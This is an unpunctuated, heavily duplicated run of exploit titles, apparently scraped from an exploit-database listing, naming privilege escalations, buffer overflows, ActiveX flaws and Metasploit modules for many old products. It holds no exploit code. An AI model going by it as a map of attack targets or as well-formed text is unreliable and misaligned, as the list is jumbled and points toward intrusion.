JavaScript Function Stack Overflow (1) Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2) Microsoft SQL Server - sp_replwritetovarbin() Heap Overflow Microsoft SQL Server - 'sp_replwritetovarbin()' Heap Overflow PHP 5.2.8 gd library - imageRotate() Information Leak PHP 5.2.8 gd library - 'imageRotate()' Information Leak Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption Adobe Acrobat Reader 8.1.2 < 9.0 - 'getIcon()' Memory Corruption PHP - mb_ereg(i)_replace() Evaluate Replacement String PHP - 'mb_ereg(i)_replace()' Evaluate Replacement String Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) FreeBSD 6.1 - kqueue() Null Pointer Dereference Privilege Escalation Multiple BSD Operating Systems - setusercontext() Vulnerabilities Avast! 4.8.1335 Professional - Local Kernel Buffer Overflow FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation Multiple BSD Operating Systems - 'setusercontext()' Vulnerabilities Avast! 
4.8.1335 Professional - Kernel Local Buffer Overflow Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation OtsTurntables 1.00.027 - '.m3u' / '.ofl' Local Universal Buffer Overflow (SEH) OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH) Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Privilege Escalation (2) Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Privilege Escalation (2) Millenium MP3 Studio - (pls/mpf/m3u) Local Universal Buffer Overflows (SEH) Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflows (SEH) Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Privilege Escalation (3) Linux Kernel 2.4/2.6 - 'sock_sendpage()' Privilege Escalation (3) PlayMeNow 7.3 / 7.4 - Malformed '.M3U' Playlist File Buffer PlayMeNow 7.3/7.4 - Malformed '.M3U' Playlist File Buffer Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit) PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit) HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow (Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Privilege Escalation (Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Privilege Escalation PHP 6.0 Dev - str_transliterate() Buffer Overflow PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - OpenSession() Buffer Overflow Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Buffer Overflow IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow IP2location.dll 1.0.0.1 - Function 'Initialize()' Buffer Overflow FreeBSD Kernel - nfs_mount() Exploit FreeBSD Kernel - 
'nfs_mount()' Exploit MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH) Triologic Media Player 8 - '.m3u' Local Universal Unicode Buffer Overflow (SEH) MUSE 4.9.0.006 - '.pls' Universal Local Buffer Overflow (SEH) Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH) FreeBSD - mbufs() sendfile Cache Poisoning Privilege Escalation FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - CAN BCM Privilege Escalation Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Privilege Escalation AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit) AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit) Adobe - Collab.collectEmailInfo() Buffer Overflow (Metasploit) Adobe - 'Collab.collectEmailInfo()' Buffer Overflow (Metasploit) NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow NetOp Remote Control 8.0/9.1/9.2/9.5 - Buffer Overflow PHP 5.3.5 - socket_connect() Buffer Overflow PHP 5.3.5 - 'socket_connect()' Buffer Overflow Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Privilege Escalation mount.cifs - chdir() Arbitrary Root File Identification mount.cifs - 'chdir()' Arbitrary Root File Identification Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (1) Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (2) Slackware Linux 3.1/3.2 - 'color_xterm' Buffer Overflow (1) Slackware Linux 3.1/3.2 - color_xterm Buffer Overflow (2) Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - vsyslog() Buffer Overflow Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Buffer Overflow Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow Xi Graphics Accelerated X 4.0.x/5.0 - Buffer Overflow RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (2) RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Buffer Overflow (2) QSSL QNX 4.25 A 
- crypt() Exploit QSSL QNX 4.25 A - 'crypt()' Exploit Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2) Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (2) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2 / 1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2 / 1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1) Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2) X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 _XAsyncReply() Stack Corruption X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 '_XAsyncReply()' Stack Corruption Linux Kernel 2.2.x - sysctl() Memory Reading (PoC) Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC) Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1) Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2) Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1) Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2) Linux Kernel 2.2 / 2.4 - procfs Stream redirection to Process Memory Privilege Escalation Linux Kernel 2.2/2.4 - procfs Stream redirection to Process Memory Privilege Escalation Linux Kernel 2.2 / 2.4 - Ptrace/Setuid Exec Privilege Escalation Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Privilege Escalation Linux Kernel 2.2.x / 2.3 / 2.4.x - d_path() Path Truncation (PoC) Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation (PoC) Python 1.5.2 Pickle - Unsafe eval() Code Execution Python 1.5.2 Pickle - Unsafe 'eval()' 
Code Execution Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (1) Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (2) Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (3) Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (1) Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (2) Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (3) ESCPUtil 1.15.2 2 - Local Printer Name Buffer Overflow ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (2) Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1) Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2) Linux Kernel 2.2.x / 2.4.x - I/O System Call File Existence Linux Kernel 2.2.x/2.4.x - I/O System Call File Existence Zblast 1.2 - Local 'Username' Buffer Overrun Zblast 1.2 - 'Username' Local Buffer Overrun Linux PAM 0.77 - Pam_Wheel Module getlogin() 'Username' Spoofing Privilege Escalation Linux PAM 0.77 - Pam_Wheel Module 'getlogin()' 'Username' Spoofing Privilege Escalation Linux Kernel 2.2.x / 2.4.x - '/proc' Filesystem Potential Information Disclosure Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Potential Information Disclosure Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun Elm 2.3/2.4 - Local TERM Environment Variable Buffer Overrun Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun Elm 2.3/2.4 - TERM Environment Variable Local Buffer Overrun GNU AN - Local Command Line Option Buffer Overflow GNU AN - Command Line Option Local Buffer Overflow OpenBSD 3.3 - Semget() Integer Overflow (1) OpenBSD 3.3 - Semget() Integer Overflow (2) OpenBSD 3.3 - 'Semget()' Integer Overflow (1) OpenBSD 3.3 - 'Semget()' Integer Overflow (2) Sendmail 8.12.9 - Prescan() Variant 
Remote Buffer Overrun Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (1) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (2) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (3) Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1) Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (2) Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (3) Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Memory Read HP-UX 7-11 - Local X Font Server Buffer Overflow HP-UX 7-11 - X Font Server Local Buffer Overflow Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1) Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1) Photodex ProShow Gold/Producer 5.0.3310 / 6.0.3410 - ScsiAccess Privilege Escalation Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - ScsiAccess Privilege Escalation Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities Newsgrab 0.5.0pre4 - Local/Remote Multiple Vulnerabilities Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1) Linux Kernel 2.4.30 / 2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1) Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation Ophcrack 3.5.0 - Local Code Execution Buffer Overflow Ophcrack 3.5.0 - Code Execution Local Buffer Overflow PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass PHP 4.x/5.0/5.1 - 'mb_send_mail()' Function Parameter Restriction Bypass Linux Kernel 2.4.x / 2.5.x / 2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities Linux Kernel 2.4.x/2.5.x/2.6.x - 
Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities IBM AIX 6.1 / 7.1 - Privilege Escalation IBM AIX 6.1/7.1 - Privilege Escalation Nodejs - js-yaml load() Code Exec (Metasploit) Nodejs - 'js-yaml load()' Code Exec (Metasploit) PHP 5.2.1 - Session.Save_Path() TMPDIR open_basedir Restriction Bypass PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass ELinks Relative 0.10.6 / 011.1 - Path Arbitrary Code Execution ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution suPHP 0.7 - 'suPHP_ConfigPath' Safe_Mode() Restriction Bypass Exploit suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass Exploit Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3) Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3) Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution Microsoft Office 2007/2010 - OLE Arbitrary Command Execution MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit) ImageMagick 6.9.3-9/7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit) Proxifier for Mac 2.17 / 2.18 - Privesc Escalation Proxifier for Mac 2.17/2.18 - Privesc Escalation Sendmail 8.12.8 - Prescan() BSD Remote Command Execution Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution BFTPd - vsprintf() Format Strings Exploit BFTPd - 'vsprintf()' Format Strings Exploit OpenBSD ftpd 2.6 / 2.7 - Remote Exploit OpenBSD ftpd 2.6/2.7 - Remote Exploit Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit Rlpr 2.04 - msg() Remote Format String Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Exploit Rlpr 2.04 - 'msg()' Remote Format String Courier-IMAP 3.0.2-r1 - auth_debug() Remote 
Format String Courier-IMAP 3.0.2-r1 - 'auth_debug()' Remote Format String PHP 4.3.7 - openlog() Buffer Overflow PHP 4.3.7 - 'openlog()' Buffer Overflow Apple iTunes - Playlist Local Parsing Buffer Overflow Apple iTunes - Playlist Parsing Local Buffer Overflow Newspost 2.1 - socket_getline() Remote Buffer Overflow (2) Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2) CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit) CA Unicenter 3.1 - CAM 'log_security()' Stack Overflow (Metasploit) sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String sobexsrv 1.0.0_pre3 Bluetooth - 'syslog()' Remote Format String Mozilla Firefox 1.04 - compareTo() Remote Code Execution Mozilla Firefox 1.04 - 'compareTo()' Remote Code Execution Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit) Mozilla Firefox 1.5 (OSX) - location.QueryInterface() Code Execution (Metasploit) Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit) Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit) crossfire-server 1.9.0 - SetUp() Remote Buffer Overflow crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow MySQL 4.1.18/5.0.20 - Local/Remote Information Leakage Exploit Quake 3 Engine 1.32b - 'R_RemapShader()' Remote Client Buffer Overflow iShopCart - vGetPost() Remote Buffer Overflow (cgi) iShopCart - 'vGetPost()' Remote Buffer Overflow (CGI) Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - 'FTP' Remote Exploit Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote Exploit XMPlay 3.3.0.4 - (PLS) Local+Remote Buffer Overflow Oracle 9i / 10g - (read/write/execute) Exploitation Suite XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow Oracle 9i/10g - (read/write/execute) Exploitation Suite Oracle 9i / 10g (extproc) - Local / Remote Command Execution Oracle 9i / 
10g - 'utl_file' FileSystem Access Exploit Oracle 9i/10g - 'extproc' Local/Remote Command Execution Oracle 9i/10g - 'utl_file' FileSystem Access Exploit Portable OpenSSH 3.6.1p-PAM / 4.1-SuSE - Timing Attack Exploit Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack Exploit PHP 4.4.3 < 4.4.6 - PHPinfo() Cross-Site Scripting PHP 4.4.3 < 4.4.6 - 'PHPinfo()' Cross-Site Scripting XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow XAMPP for Windows 1.6.0a - 'mssql_connect()' Remote Buffer Overflow IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow IPIX Image Well - ActiveX 'iPIX-ImageWell-ipix.dll' Buffer Overflow Zenturi ProgramChecker ActiveX - 'sasatl.dll' Remote Buffer Overflow Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow Zenturi ProgramChecker - ActiveX NavigateUrl() Insecure Method Exploit Zenturi ProgramChecker - 'ActiveX NavigateUrl()' Insecure Method Exploit NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()' Insecure Method HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - SaveToFile() Exploit HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' Exploit NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow Versalsoft HTTP File Uploader - AddFile() Remote Buffer Overflow Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow Data Dynamics ActiveReport ActiveX - 'actrpt2.dll 2.5' Insecure Method Data Dynamics ActiveReport - ActiveX 'actrpt2.dll 2.5' Insecure Method Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow CHILKAT ASP String - 'CkString.dll 1.1' SaveToFile() Insecure Method Yahoo! 
Widget < 4.0.5 - 'GetComponentVersion()' Remote Overflow CHILKAT ASP String - 'CkString.dll 1.1' 'SaveToFile()' Insecure Method NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - SetText() Remote Exploit NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - SaveXMLFile() Insecure Method NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - DeleteXMLFile() Insecure Method NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Remote Exploit NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'SaveXMLFile()' Insecure Method NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'DeleteXMLFile()' Insecure Method Microsoft MSN Messenger 7.x (8.0?) - Video Remote Heap Overflow Microsoft MSN Messenger 7.x/8.0? - Video Remote Heap Overflow GlobalLink 2.7.0.8 - 'glItemCom.dll' SetInfo() Heap Overflow GlobalLink 2.7.0.8 - 'glItemCom.dll' 'SetInfo()' Heap Overflow GlobalLink 2.7.0.8 - 'glitemflat.dll' SetClientInfo() Heap Overflow Ultra Crypto Component - 'CryptoX.dll 2.0' SaveToFile() Insecure Method GlobalLink 2.7.0.8 - 'glitemflat.dll' 'SetClientInfo()' Heap Overflow Ultra Crypto Component - 'CryptoX.dll 2.0' 'SaveToFile()' Insecure Method jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution Persits Software XUpload Control - AddFolder() Buffer Overflow Persits Software XUpload Control - 'AddFolder()' Buffer Overflow idautomation bar code ActiveX - Multiple Vulnerabilities idautomation bar code - ActiveX Multiple Vulnerabilities C6 Messenger ActiveX - Remote Download and Execute Exploit C6 Messenger - ActiveX Remote Download and Execute Exploit NuMedia Soft Nms DVD Burning SDK ActiveX - 'NMSDVDX.dll' Exploit NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Exploit GdPicture Pro ActiveX - 'gdpicture4s.ocx' File Overwrite / Exec Exploit GdPicture Pro - ActiveX 'gdpicture4s.ocx' File Overwrite / Exec Exploit MW6 Aztec ActiveX - 'Aztec.dll' Remote Insecure Method Exploit MW6 Barcode ActiveX - 'Barcode.dll' Insecure Method Exploit MW6 Aztec - ActiveX 
'Aztec.dll' Remote Insecure Method Exploit MW6 Barcode - ActiveX 'Barcode.dll' Insecure Method Exploit GE Fanuc Real Time Information Portal 2.6 - writeFile() API Exploit (Metasploit) GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API Exploit (Metasploit) EasyMail ActiveX - 'emmailstore.dll 6.5.0.3' Buffer Overflow EasyMail - ActiveX 'emmailstore.dll 6.5.0.3' Buffer Overflow Megacubo 5.0.7 - (mega://) Remote eval() Injection Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite EDraw Office Viewer 5.4 - HttpDownloadFile() Insecure Method EDraw Office Viewer 5.4 - 'HttpDownloadFile()' Insecure Method Oracle Secure Backup 10g - exec_qr() Command Injection Oracle Secure Backup 10g - 'exec_qr()' Command Injection Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow Adobe Reader 8.1.4/9.1 - 'GetAnnots()' Remote Code Execution Adobe 8.1.4/9.1 - 'customDictionaryOpen()' Code Execution BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow AOL IWinAmpActiveX Class ConvertFile() - Remote Buffer Overflow AOL IWinAmpActiveX Class - 'ConvertFile()' Remote Buffer Overflow Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities Virtualmin < 3.703 - Local/Remote Multiple Vulnerabilities Quiksoft EasyMail 6.0.3.0 - imap connect() ActiveX Buffer Overflow Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow EnjoySAP 6.4 / 7.1 - File Overwrite EnjoySAP 6.4/7.1 - File Overwrite Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' 
Command Injection Blender 2.34/2.35a/2.4/2.49b - '.blend' Command Injection Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit) Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit) mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit) mDNSResponder 10.4.0/10.4.8 (OSX) - UPnP Location Overflow (Metasploit) Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit) Opera 9.50/9.61 historysearch - Command Execution (Metasploit) Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit) PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit) Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit) PoPToP < 1.1.3-b3/1.1.3-20030409 - Negative Read Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit) Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit) Borland Interbase 2007/2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit) Borland Interbase 2007/2007 SP2 - 'jrd8_create_database' Buffer Overflow (Metasploit) Borland Interbase 2007/2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit) HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit) HP-UX LPD 10.20/11.00/11.11 - Command Execution (Metasploit) PHP 5.3 - preg_match() Full Path Disclosure PHP 5.3 - 'preg_match()' Full Path Disclosure Trend Micro Web-Deployment ActiveX - Remote Execution (PoC) Trend Micro Web-Deployment - ActiveX Remote Execution (PoC) Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' 'OpenFile()' Remote Overflow Bigant Messenger 2.52 - 'AntCore.dll' RegisterCom() Remote Heap Overflow Bigant Messenger 2.52 - 'AntCore.dll' 'RegisterCom()' Remote Heap Overflow Apple Safari 4.0.5 - parent.close() (memory Corruption) Code Execution Apple Safari 4.0.5 - 'parent.close()' Memory 
Corruption Code Execution Apple Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass) Apple Safari 4.0.5 - 'parent.close()' Memory Corruption (ASLR + DEP Bypass) ComponentOne VSFlexGrid 7 / 8 - 'Archive()' method Remote Buffer Overflow ComponentOne VSFlexGrid 7/8 - 'Archive()' method Remote Buffer Overflow Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Buffer Overflow Nginx 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass) SigPlus Pro 3.74 - ActiveX 'LCDWriteString()' Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass) McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Remote Code Execution) McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (2) Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (2) Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (Metasploit) Viscom Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit) Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Buffer Overflow (Metasploit) Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Buffer Overflow Microsoft WMITools ActiveX - Remote Command Execution Microsoft WMITools - ActiveX Remote Command Execution Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256) Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Remote Exploit Apple QTJava - toQTPointer() Arbitrary Memory Access (Metasploit) Apple QTJava - 'toQTPointer()' Arbitrary Memory Access (Metasploit) Java - 
Statement.invoke() Trusted Method Chain Exploit (Metasploit) Java - 'Statement.invoke()' Trusted Method Chain Exploit (Metasploit) Mozilla Firefox 3.5 - escape() Return Value Memory Corruption (Metasploit) Mozilla Firefox 3.5 - 'escape()' Return Value Memory Corruption (Metasploit) Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution (Metasploit) Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit) Sun Solaris sadmind - adm_build_path() Buffer Overflow (Metasploit) Sun Solaris sadmind - 'adm_build_path()' Buffer Overflow (Metasploit) Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (MS07-029) (Metasploit) Microsoft DNS RPC Service - 'extractQuotedChar()' Overflow 'SMB' (MS07-029) (Metasploit) Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit) Firebird Relational Database - 'SVC_attach()' Buffer Overflow (Metasploit) Firebird Relational Database - isc_create_database() Buffer Overflow (Metasploit) Firebird Relational Database - 'isc_create_database()' Buffer Overflow (Metasploit) Firebird Relational Database - isc_attach_database() Buffer Overflow (Metasploit) Firebird Relational Database - 'isc_attach_database()' Buffer Overflow (Metasploit) 